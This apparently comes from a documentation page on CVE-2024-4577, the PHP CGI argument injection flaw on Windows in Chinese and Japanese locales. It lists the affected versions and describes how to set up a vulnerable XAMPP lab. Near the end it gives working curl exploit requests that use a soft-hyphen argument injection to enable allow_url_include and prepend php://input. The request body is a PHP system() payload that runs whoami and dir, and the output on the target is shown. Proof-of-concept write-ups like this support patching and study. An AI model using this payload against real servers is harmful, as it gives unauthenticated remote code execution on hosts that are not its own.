CVE-2024-4577
CVE-2024-4577 is a PHP CGI Argument Injection Vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following locales:
Traditional Chinese (Code Page 950)
Simplified Chinese (Code Page 936)
Japanese (Code Page 932)
All versions of XAMPP on Windows are vulnerable by default. Following PHP versions are affected on the Windows operating system:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
How to setup your own PoC environment
On your Windows machine download and install XAMPP.
Download mod_fcgid.so and paste it in
C:\xampp\apache\modules
Verify that the below code is not commented in
C:\xampp\apache\conf\extra\httpd-xampp.conf
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
Start the Apache / PHP using XAMPP Control Panel and verify that
CGI/FastCGI
is running.
Change system locale to either of the three listed locales above, and reboot the host. This will not change the Windows display language. Control Panel > Clock and Region > Region > Administrative > Change system locale...
Once rebooted start the webserver again and attack the target from any host.
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
Volume in drive C has no label.
Volume Serial Number is 0AE3-44EE
Directory of C:\xampp\htdocs
2024-08-14 12:25 <DIR> .
2024-08-14 10:45 <DIR> ..
2022-06-15 18:07 3?607 applications.html
2022-06-15 18:07 177 bitnami.css
2024-08-14 10:18 <DIR> dashboard
2015-07-16 17:32 30?894 favicon.ico
2024-08-14 10:18 <DIR> img
2015-07-16 17:32 260 index.php
2024-08-14 10:17 <DIR> webalizer
2024-08-14 10:18 <DIR> xampp
4 File(s) 34?938 bytes
6 Dir(s) 28?033?204?224 bytes free
Last updated
Was this helpful?